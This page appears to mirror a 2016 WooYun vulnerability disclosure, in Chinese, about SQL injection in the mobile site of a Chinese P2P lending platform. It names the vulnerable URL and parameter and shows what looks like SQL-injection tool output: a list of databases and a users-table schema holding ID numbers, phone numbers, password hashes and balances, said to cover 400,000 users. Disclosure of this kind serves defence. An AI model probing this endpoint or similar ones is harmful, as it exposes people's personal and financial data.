P2P安全之华人金融某处严重安全缺陷涉及四十万用户敏感信息

admin
admin
admin
105013
文章
87
评论
2017年5月3日14:24:10评论363 views字数 225阅读0分45秒阅读模式
摘要

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-192025

漏洞标题: P2P安全之华人金融某处严重安全缺陷涉及四十万用户敏感信息

相关厂商: 华人金融

漏洞作者: Exploit DB

提交时间: 2016-04-06 11:22

公开时间: 2016-05-21 11:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT.

详细说明:

code 区域 
http://wap.5262.com/index/notice?action=list&mstatus=1

P2P安全之华人金融某处严重安全缺陷涉及四十万用户敏感信息

code 区域 
available databases [9]:
 [*] accounts_data
 [*] billstable_data
 [*] borrow_data
 [*] gome_data
 [*] log_data
 [*] members_data
 [*] order_data
 [*] queue_data
 [*] test
code 区域 
Database: members_data
 Table: data_users
 [53 columns]
 +------------------+-----------------------+
 | Column           | Type                  |
 +------------------+-----------------------+
 | agent_reg        | tinyint(1)            |
 | auth_time        | int(10)               |
 | becomeManageTime | int(11)               |
 | bmz              | varchar(10)           |
 | bumeng           | varchar(8)            |
 | city             | varchar(20)           |
 | email            | varchar(30)           |
 | freezeMoney      | varchar(60)           |
 | from_weixin      | char(6)               |
 | fundStatus       | tinyint(1)            |
 | hash             | varchar(32)           |
 | IDcardNo         | varchar(30)           |
 | imei             | varchar(50)           |
 | income           | float(11,2)           |
 | is_legal         | tinyint(1)            |
 | isEmail          | tinyint(1)            |
 | isexport         | tinyint(1)            |
 | isgree           | tinyint(1)            |
 | isLock           | tinyint(2)            |
 | isManages        | tinyint(2)            |
 | isMobile         | tinyint(1)            |
 | ismzf            | tinyint(4)            |
 | isPass           | tinyint(1)            |
 | jgid             | int(11)               |
 | lastloginDate    | int(11)               |
 | loginNum         | int(11)               |
 | manageDate       | int(11)               |
 | mobile           | varchar(11)           |
 | money            | float(11,2)           |
 | moneyLock        | tinyint(2)            |
 | myGroupID        | varchar(20)           |
 | myIntoID         | int(11)               |
 | myManageID       | int(11)               |
 | myMoney          | varchar(100)          |
 | passWord         | varchar(32)           |
 | payPassWord      | varchar(32)           |
 | platform         | int(11)               |
 | preloginDate     | int(11)               |
 | prov             | varchar(20)           |
 | qrimage          | varchar(200)          |
 | rank             | tinyint(2)            |
 | realName         | varchar(30)           |
 | regip            | varchar(50)           |
 | regTime          | int(11)               |
 | sourceId         | varchar(100)          |
 | terminal         | tinyint(4)            |
 | topRecommend     | int(11)               |
 | userform         | tinyint(1)            |
 | userid           | int(11)               |
 | userName         | varchar(30)           |
 | userSource       | varchar(30)           |
 | userType         | enum('1','2','3','4') |
 | weixin_uid       | varchar(32)           |
 +------------------+-----------------------+

40W用户敏感信息泄露

P2P安全之华人金融某处严重安全缺陷涉及四十万用户敏感信息

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin